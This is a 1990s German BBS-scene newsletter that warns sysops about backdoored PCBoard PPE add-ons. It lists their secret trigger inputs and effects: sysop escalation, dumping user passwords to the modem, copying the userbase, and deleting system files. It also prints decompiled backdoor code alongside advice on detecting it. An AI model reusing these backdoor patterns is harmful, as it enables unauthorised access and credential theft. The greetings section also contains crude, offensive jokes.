Ŀ
        1000 YEARS OF UNDERGROUND EMPiRE WORLD DOMiNATiON                   
                
                                        
                                             
                                    
                                                                        
                                       sci.ue        
                                                             
                    
                     ROYAL BAVARiAN WAREZ-SUPPLiER SiNCE 1795             
                                                                            
                                                                            
Ĵ
                    P C   B O A R D   N E W S L E T T E R                   
Ĵ
                            written by: BAD PEON                            
Ĵ
                                                                            
                                                                            
Ĵ
                                -1. VORWORT                                 
Ĵ
                                                                            
  Moin!                                                                     
  Wir haben uns gedacht, wir bringen mal n paar Infos ber Backdoors in     
  PPEs und ber die Zukunft von PC Board bzw. die des Herstellers Clark     
  Development Company (CDC) selbst, damit ihr auch wisst, was Sache ist.    
                                                                            
                                                                            
Ĵ
                           0. INHALTSVERZEICHNIS                            
Ĵ
                                                                            
  -1. VORWORT  -  Bla                                                       
   0. INHALTSVERZEICHNIS  -  H?!                                           
   1. BACKDOORS IN PPES  -  Sechs konkrete Beispiele                        
   2. WIE MAN SICH VOR BACKDOORS SCHTZT  -  Erkennen und vernichten!       
   3. EIN AUSBLICK IN DIE ZUKUNFT  -  PPLC 3.40 suckt!                      
   4. WAS IST MIT CDC LOS?  -  Haste ma ne Mark?                            
   5. DIES UND DAS UND IRGENDWAS  -  Greetings und Welteroberungsplne      
                                                                            
                                                                            
Ĵ
                            1. BACKDOORS IN PPES                            
Ĵ
                                                                            
  Aja... diese Beispiele sind nicht alle 100% aktuell, aber die meisten     
  Sysops werfen PPEs nicht einfach weg, bloss weil sie alt sind... es ist   
  also gut mglich, dass der einer oder andere seit Monaten in seinem       
  Board PPEs mit Backdoors laufen hat... :)                                 
                                                                            
                                                                            
  TITEL       : Intense Flag vO.8                                           
  GROUP       : CIA - Creators of Insane Art                                
  ARCHIVNAME  : CIAFLG08.ZIP                                                
  PPE-FILENAME: IFLAG.PPE                                                   
  HERKUNFT    : N/A                                                         
  FILE_ID.DIZ :                                                             
         .c!a.                       ܲ                            
             ܲ    ܲܲ               ߲                           
        ܲ   ۲  ܲ                                   
          ܲ         ߲޲ܲ                                  
          XX߲  ߲ܲ                                         
         ݰ ۲  ۲  ޲                              
           ߲ ߲   ۲                                
            ߲ ߰ ߲߲                                  
                 ܲ                                       
               ۲     ۲                                       
                 .    .                                        
       [===(07/15/95)=============================]                         
          Intense Flag vO.8 by Dark Jester [PPE]                            
        For PCB 15.21+ ONLY!  A NEW FLAG PPE more                           
              like the PiPELiNE interface!                                  
                                                                            
  Aktivierung durch: Eingabe von "iA!"                                      
  Effekt           : Gibt dem User Sysop-Security.                          
                                                                            
                                                                            
                                                                            
  TITEL       : Press Enter.PPE                                             
  GROUP       : DC - Dark Community                                         
  ARCHIVNAME  : DC-ENTER.ZIP                                                
  PPE-FILENAME: ENTER.PPE                                                   
  HERKUNFT    : Ultra lame, also wahrscheinlich von den Autoren selbst.     
  FILE_ID.DIZ :                                                             
       +++DARK  COMMUNITY+++                                                
       |  PRESS ENTER.PPE  |                                                
       | IMPORTANT FOR ALL |                                                
       | SYSOPS!!!         |                                                
       | READ DC.NFO FILE  |                                                
       | TO GET A PRESENT  |                                                
       |-------------------|                                                
       |    [05/03/97]     |                                                
                                                                            
  Aktivierung durch: Eingabe von "!"                                        
  Effekt           : Gibt die Namen und Passwrter der ersten zehn Benutzer 
                     des Sytems (also u.a. auch des Sysops) ans Modem aus,  
                     nicht aber an den lokalen Screen!                      
                                                                            
                                                                            
                                                                            
  TITEL       : Menu Command                                                
  GROUP       : A.R Team                                                    
  ARCHIVNAME  : N/A                                                         
  PPE-FILENAME: MPROMPT.PPE                                                 
  HERKUNFT    : Anscheinend gerippt, mit Backdoor versehen und rereleaset.  
  FILE_ID.DIZ :                                                             
          A GREAT NEW PPE FROM A.R TEAM                                 
         MENU COMMAND! FADING, PALETTE                                  
         CHANGING, DELAY CFG.. 100% CFG!                                
          GREAT NEW PPE !!! TAKE'T NOW!                                 
                                                                            
  Aktivierung durch: Eingabe von "FFF1"                                     
  Effekt           : Gibt dem User Sysop-Security.                          
                                                                            
                                                                            
                                                                            
  TITEL       : Energy Meter Logoff Prompt                                  
  GROUP       : Ako/Cpc ??                                                  
  ARCHIVNAME  : WAVLOGOF.ZIP                                                
  PPE-FILENAME: WAVLOGOF.PPE                                                
  HERKUNFT    : Ultra lame, also wahrscheinlich von den Autoren selbst.     
  FILE_ID.DIZ :                                                             
         ENERGY METER LOGOFF PROMPT    ͻ                           
        PPE- To Replace the Cheesy PCB default                            
        "Proceed with logoff" prompt. This has                            
        LIGHT BAR and COOL ANIMATIONS (which is                           
        rare in PPEs) this is a MUST TRY!!!!                              
       PeeHS KcaLB [01/04/96] =AKo= ļ                           
                                                                            
  Aktivierung durch: Drcken von "*" nach dem Whlen von "USE RESERVES".    
  Effekt           : Gibt dem User Userlevel 110 (Standartvorgabe fr       
                     Sysoplevel). Das funktioniert nur, wenn es im PWRD-    
                     File diesen Userlevel auch gibt.                       
                                                                            
                                                                            
                                                                            
  TITEL       : Protocol Select Replacement                                 
  GROUP       : Gilden                                                      
  ARCHIVNAME  : N/A                                                         
  PPE-FILENAME: N/A                                                         
  HERKUNFT    : Fake: einfach Version v2.0 mit nem Backdoor drin.           
  FILE_ID.DIZ :                                                             
        -( PROTOCOL SELECT  REPLACEMENT )Ļ                              
            Ŀ                             
                                              
                                              
                                             
           ͼ                             
                                                                          
         NiCE CURSOR iNTERFACE                                           
         FULLY CONFiGURABLE         (v2.1)                               
         MiNOR BUGFiX         (PANDUR/GLD)                               
        ---(13/o1/96)                              
                                                                            
  Aktivierung durch: N/A                                                    
  Effekt           : Gibt dem User Sysop-Security.                          
                                                                            
                                                                            
                                                                            
  TITEL       : Oneliner v.1                                                
  GROUP       : Independent: Black Night                                    
  ARCHIVNAME  : BK-ONEL.ZIP oder BK!ONEL.ZIP                                
  PPE-FILENAME: ONELINER.PPE                                                
  HERKUNFT    : Ein Fake, der NICHT von Black Night stammt.                 
                Entdeckt von The Mighty SCI!, Cyz und Co.                   
  FILE_ID.DIZ :                                                             
                                                 
                                                     
                                                        
                                                      
               LiNeR V.1                                                  
                                                 
                                                  
       CODEDBYBLACKKNIGHT                                          
       ܲ                                          
                                                                            
  Ein echtes "Meisterwerk", ber das wir schon einmal berichtet haben (in   
  UE-00074), aber mittlerweile haben wir genauere Infos darber. Diese PPE  
  enthlt gleich mehrere Backdoors:                                         
                                                                            
  1.                                                                        
  Aktivierung durch: Starten der PPE                                        
  Effekt           : Kopiert die Userbase und moved sie unter drei anderen  
                     Namen (THCHNO.ZIP, THBSHTBV.TXT, JANK.ZIP) ins Down-   
                     load-Verzeichnis der Main Board-Konferenz und trgt    
                     sie auch gleich in die Downloadliste ein.              
                     Zum downloaden muss man "flag [name]" tippen, weil die 
                     Files ja nicht in den Filelisten landen.               
                                                                            
  2.                                                                        
  Aktivierung durch: Location des Users ist "bye bye".                      
  Effekt           : Lscht folgende Files:                                 
                      c:\autoexec.bat                                       
                      c:\autoexec.bak                                       
                      c:\config.sys                                         
                      c:\config.sys    Ein Bug :)                           
                      c:\command.com                                        
                      c:\dos\command.com                                    
                     Die folgenden Files werden auch gleich aufgesprt und  
                     selbstverstndlich ebenfalls gekillt:                  
                      USERS                                                 
                      CNAMES                                                
                      DLPATHS.LST (der Main Board-Konferenz)                
                      PCBOARD.DAT                                           
                     Achja... da hier das DELETE-Kommando von PC Board be-  
                     nutzt wird, sollte es nicht weiter schwer sein, diese  
                     Files mittels einer Bootdiskette und UNDELETE wieder-  
                     herzustellen. bringens wird das DELETE-Kommando NICHT 
                     von PPLX 2.00 angekreidet!                             
                                                                            
  3.                                                                        
  Aktivierung durch: Location des Users ist "chicken man".                  
  Effekt           : Gibt dem User Sysop-Security.                          
                                                                            
  4.                                                                        
  Aktivierung durch: In Zeile 32 von ONELINER.CFG steht "backdoor off".     
  Effekt           : Lscht die drei Kopien der Userbase wieder.            
                                                                            
                                                                            
                                                                            
  So... wie wir gesehen haben, werden Backdoors fr gewhnlich durch Ein-   
  gaben des Users aktiviert und dienen zum Erreichen der hchstmglichen    
  Userlevels bzw. zum Zugriff auf fremde (bessere) Accounts.                
                                                                            
                                                                            
Ĵ
                   2. WIE MAN SICH VOR BACKDOORS SCHTZT                    
Ĵ
                                                                            
  Man dekompiliert einfach die fragwrdige PPE mit PPLX 2.00 und achtet da- 
  bei auf die "Decompiling Flags", die PPLX vergibt, wenn bestimmte ver-    
  dchtige Funktionen in einer PPE vorkommen. Dann sieht man sich das er-   
  zeugte PPX-File an und scrollt erst mal ganz an den Schluss, wo die Flags 
  mit ihren Erklrungen stehen. Anschliesend sucht man (vom Anfang des      
  Files an!) nach den Statements, die PPLX dort aufgefhrt hat.             
                                                                            
  Sollte ein U_PWD bemngelt worden sein, sucht man danach; wenn davor ein  
  'GetUser' steht ist es (meistens) harmlos, da es nur das Password des     
  derzeitigen Users enthlt. Steht davor allerdings ein 'GetAltUser', so    
  liest die PPE das Passwort/die Passwrter anderer User.                   
                                                                            
  Ein Beispiel aus der WAVLOGOF.PPE:                                        
                                                                            
      For INTEGER004 = 1 To 10                                              
          GetAltUser INTEGER004                                             
          MPrintLn                                                          
          MPrint "@POFF@"                                                   
          MPrintLn U_Name()                                                 
          MPrintLn U_Pwd                                                    
          MPrintLn                                                          
      Next                                                                  
                                                                            
  For/Next sorgt dafr, dass alles, was dazwischen steht, mit jedem         
  INTEGER004 von 1 bis 10 abgearbeitet wird. In diesem Fall werden also die 
  Daten des Users Nummer 1-10 geladen, eine Leerzeile wird ans Modem ge-    
  schickt (wir wollen ja schliesslich auch komfortable und ordentlich aus-  
  sehende Backdoors!), dann wird das More?-Prompt deaktiviert (einmal htte 
  auch gereicht, msste nicht in der Schleife stehen), dann wird der Name   
  des Users ausgeben, dann sein Passwort und eine weitere Leerzeile spter  
  geht das ganze mit dem nchsten User weiter.                              
                                                                            
  Ein User, der dieses Backdoor benutzt, sieht dann etwa folgendes:         
                                                                            
  BAD PEON                                                                  
  ASDFLKHSDMYVCOI                                                           
                                                                            
                                                                            
  THE MIGHTY SCI                                                            
  7328984a7w876                                                             
                                                                            
                                                                            
  OMEN                                                                      
  LINUXRULES                                                                
                                                                            
                                                                            
  M0!                                                                       
  SD.S}8ߊFS^-D%F!/&|%S(SD=,S'D54S$D#_*2`sJD;)?[@A        
                                                                            
  (usw., hab hier keinen Bock 40 Zeilen fr ein Beispiel zu opfern)         
                                                                            
                                                                            
  Ein PUTUSER bedeutet, dass die Userdaten des derzeitigen Users neu ge-    
  schrieben werden, d.h. in der Regel verndert wurden. Hierbei sollte man  
  nach einem U_SEC suchen, dass vor einem = steht, wie z.B. in dieser       
  Zeilenfolge aus der WAVLOGOF.PPE:                                         
                                                                            
      GetUser                                                               
      U_Sec = 110                                                           
      PutUser                                                               
                                                                            
  GetUser liest die Userdaten, U_Sec = 110 setzt den Userlevel auf 110 und  
  PutUser speichert dann die Userdaten. Ob der User in diesem Fall tat-     
  schlich Sysop-Privilegien geniest hngt davon ab, ob der Sysop die vor-  
  eingestellten Werte fr die Sysop-Funktionen hochgesetzt hat oder nicht,  
  aber die meisten Sysops arbeiten einfach mit der Standart-Konfiguration   
  von PC Board... selber schuld!                                            
  Wenn es in dem Board gar keinen Userlevel 110 gibt, dann gibt PC Board    
  nur eine Fehlermeldung aus und schreibt die Userdaten gar nicht erst      
  in die Userbase.                                                          
                                                                            
  Bessere Backdoors sehen da eher so aus (IFLAG.PPE):                       
                                                                            
      GetUser                                                               
      U_Sec = ReadLine(PCBDat(), 16)                                        
      PutUser                                                               
                                                                            
  Hier wird der neue Userlevel des Users auf den Wert gesetzt, der in der   
  PCBOARD.DAT in der Zeile 16 vermerkt ist, und das ist genau der Wert, der 
  zur "Users File Maintainance" erforderlich, also bei jedem halbwegs ver-  
  nnftigen Sysop der hchste Userlevel berhaupt (damit kann man Userdaten 
  aussphen und verndern). Daher wird diese PPE dem User in jedem Board    
  den maximalen Userlevel geben, auch wenn der Sysop die Konfiguration kom- 
  plett umgekrempelt hat. Gut nich? :)                                      
                                                                            
                                                                            
Ĵ
                       3. EIN AUSBLICK IN DIE ZUKUNFT                       
Ĵ
                                                                            
  Mit PC Board 15.4 kommt, wie an den Beta-Versionen zu sehen war, mal      
  wieder eine neue Version von PPLC, nmlich 3.40.                          
                                                                            
  Sie wird natrlich NICHT abwrtskompatibel sein, d.h.: ltere PC Boards   
  knnen mit PPEs, die mit PPLC 3.40 kompeliert wurden, nichts anfangen,    
  aber das war ja noch nie so.                                              
                                                                            
  Zustzlich enthlt PPLC 3.40 neue Routinen zur Verschlsselung, die       
  laut CDC das Dekompilieren fr immer unmglich machen werden.             
                                                                            
  PPEs, die mit PPLC 3.40 kompeliert wurden, knnen mit KEINEM heute        
  existenten Programm dekompiliert werden! Eine neue Flut von Backdoors     
  rollt also auf uns zu, und wir haben keine Mglichkeit, etwas dagegen     
  zu unternehmen.                                                           
                                                                            
  Lone Runner^AGS (PPLX) und Chicken^T4F (PPLD) haben damit mal wieder ein  
  hartes Stck Arbeit vor sich... Aber keine Sorge Jungs, ewiger Weltruhm   
  ist euch sicher! ;)                                                       
                                                                            
  Aber wenn man das ganze (ausnahmsweise) mal von einem objektiven Stand-   
  punkt betrachtet, so stellt man fest:                                     
                                                                            
  PPEs, die mit PPLC 3.40 kompiliert wurden...                              
  -sind maximal 0.1% kleiner im Vergleich zu PPLC 3.30,                     
  -bentigen lnger, um von PC Board entschlsselt zu werden,               
  -erzielen wegen der Verschlsselung noch schlechtere Pack-Raten,          
  -laufen nur auf PC Board 15.4,                                            
  -sind IMMER verdchtig, Backdoors zu enthalten,                           
  -und sind daher ein absolut tdliches Risiko fr jeden Sysop!             
                                                                            
  Daher wrde ich es als PPE-Coder nicht fr sehr sinnvoll halten, meine    
  PPEs mit PPLC 3.40 zu kompelieren, weil sonst jeder Angst vor einem       
  mglichen Backdoor hat und nichts unternehmen kann, um dieses Risiko zu   
  minimieren.                                                               
  Deshalb werden bis auf weiters (also etwa bis PPLX/PPLD mit PPLC 3.40 um- 
  gehen knnen) alle PPEs von Underground Empire nicht mit PPLC 3.40 kom-   
  peliert!                                                                  
                                                                            
  Wenn ihr eine Underground Empire-PPE findet, die mit PPLC 3.40 kom-       
  peliert wurde, die neuer als die brigen Files im Archiv ist, deren Datum 
  nicht mit dem im -UE-REL-.NFO bereinstimmt oder die sonstwie einen merk- 
  wrdigen Eindruck macht, dann installiert es nicht sondern schickt es     
  uns! Bis jetzt sind zwar noch keine gehackten Versionen von UE-PPEs auf-  
  getaucht, aber einmal ist immer das erste mal. ;(                         
                                                                            
                                                                            
  Noch ein Wort zum Dekompilieren im allgemeinen:                           
  Ich benutze keine Decompiler-Traps, weil ich finde, dass jeder die Mg-   
  lichkeit haben sollte, sich den Code einer PPE anzusehen, um herauszu-    
  finden, was sie eigentlich so treibt.                                     
  Ausserdem kann das Rekompilieren die einzige Mglichkeit sein, die PPE    
  an sein Board anzupassen, falls die Configfiles nicht umfassend genug     
  ausfallen sollten.                                                        
                                                                            
  Natrlich weiss ich, dass es genug Leute gibt, die sich den Code "einfach 
  so" anschauen bzw. gerade selber eine hnliche PPE schreiben ;)           
                                                                            
  Aber was spricht dagegen, sich anzusehen, wie andere Leute ein bestimmtes 
  Problem gelst haben?? Das ganze hrt fr mich genau dann auf, wenn ganze 
  Passagen einer dekompilierten PPE in eine neue, "eigene" PPE kopiert und  
  nur noch die Namen der Variablen angepasst werden. Das ist dann nicht     
  mehr Inspiration, sondern dumpfes Abschreiben!                            
                                                                            
  WARUM HAT CDC WAS GEGEN DECOMPILER?                                       
  Guckt euch mal die Preisliste von CDC an :) Auch wenn sie ihre Preise er- 
  heblich gesenkt haben, so bleibt PC Board ein Profi-Programm, an dem auch 
  andere Firmen etwas verdienen wollen, indem sie z.B. Shareware-PPEs mit   
  eingeschrnktem Funktionsumfang rausbringen, die dann sofort gecrackt     
  werden.                                                                   
                                                                            
                                                                            
Ĵ
                           4. WAS IST MIT CDC LOS?                          
Ĵ
                                                                            
  Wie wir inzwischen erfahren haben, ist die Firma CDC mittlerweile PLEITE  
  und es sieht so aus, als wrden smtliche Angestellte arbeitslos und der  
  gesamte Firmenbesitz verschachert werden.                                 
                                                                            
  Allerdings versucht der harte Kern von CDC, Wege zu finden, um das Ge-    
  schft nicht komplett aufgeben zu mssen, da sie mit PC Board Metaworlds  
  ja ein zukunftstrchtiges Programm haben, dass nur deswegen kein Geld     
  bringt, weil es noch nicht 100%ig ausgereift ist und weil CDC schlicht    
  kein Geld hat, um Werbung dafr zu machen.                                
                                                                            
  PC Board selbst lsst sich im Zeitalter der Vlkerwanderung ins Internet  
  ja kaum noch verkaufen, CDC hat das zu spt erkannt und daher haben sie   
  jetzt Probleme, zu berleben.                                             
                                                                            
  Wir werden trotzdem weiterhin PPEs entwickeln und die meisten Sysops      
  werden auch nicht sofort ihre Boards wegschmeissen, nur weil es in der    
  nchsten Zeit keine Updates mehr fr PC Board geben wird... viele Sysops  
  benutzen ja z.B. immer noch PC Board 15.22, obwohl schon 2 neuere Ver-    
  sionen da sind, nmlich 15.3 und 15.4beta.                                
                                                                            
                                                                            
Ĵ
                       5. DIES UND DAS UND IRGENDWAS                        
Ĵ
                                                                            
  Ich grsse:                                                               
                                                                            
  ACE ARUU, HANDO und THE EXORCIST, die einige Bugs im derzeit laufenden    
  Beta-Test fr einige PPEs (u.a. UE!WHO v2.0) gefunden haben, THE MIGHTY   
  SCI, der so nett ist, fr die Defizite eines ganz bestimmten Ex-UE-Mem-   
  bers einzuspringen, ALLY605, der etwas glcklos ein PC Board mit allem,   
  was man so braucht, laufen hat ohne dass es jemand bemerken wrde, JOSEF, 
  dessen "Gilde Szene Beobachter" sich eigentlich nur um uns dreht, CYZ,    
  der es immer noch nicht geschafft hat, mich wieder in sein Board zu las-  
  sen, TIGER, der vor Objektivitt nur so strotzende UE-Kritiker von VDO,   
  HEADBANGER, von dem ich endlich alle persnlichen Daten habe, FEAR        
  FACTORY, die wohl bald die Charts erstrmen werden, VENOM, ohne die es    
  keinen Trash, Death, Black oder sonstwas-Metal geben wrde, SLAYER, die   
  hoffentlich wieder zu ihrer alten Klasse zurckfinden, DOC FRED, dessen   
  Mrder freien Download in allen UE-Boards bekommt, MANIAC, dessen Board   
  total vergammelt, ALLE USER DER WESTERN ALLIANCE, die jeden Upload fr    
  eine persnliche Opferung halten, ALLE LAMER DER 09 AREA, die anscheinend 
  aus allen anderen Areas rausgeschmissen wurden, MARIA UND JOSEF, deren    
  Sohn ziemlich kaputt ist und sich fr JESUS hlt, SUICIDAL SNOWMAN UND    
  WHITE TRASH, die sich pausenlos gegenseitig vergewaltigen und nebenbei    
  noch die gesamte US-ANSI-Szene durch den Dreck ziehen, HGH, die uns       
  immerhin auch mal gegreetet haben und eigentlich ganz ok waren, LORD      
  XEEN, dessen PPEs bis heute unkopiert sind und dessen griechischer Dealer 
  immer noch tot ist, DIR, dass du diesen Schmontz liest und ALLE SYSOPS,   
  dass sie sich auch mal Sorgen um ihre Boardsoftware machen. :)            
                                                                            
                                                                            
  Noch was:                                                                 
  Wie allgemein zu Vernehmen ist, sind eine ganze Menge Sysops derzeit      
  damit beschftigt, sehnschtig auf einen Nachfolger fr die Standart-     
  PPE FLAG.PPE von PWA zu warten... nur noch wenige Monate!                 
  Aja genau: Greets an Xtreeman & Synopsis! ;)                              
                                                                            
                                                                            
                                                                            
  CYA... I AM BAD PEON!                                                     
                                                                            
                                                                            
[EOF]
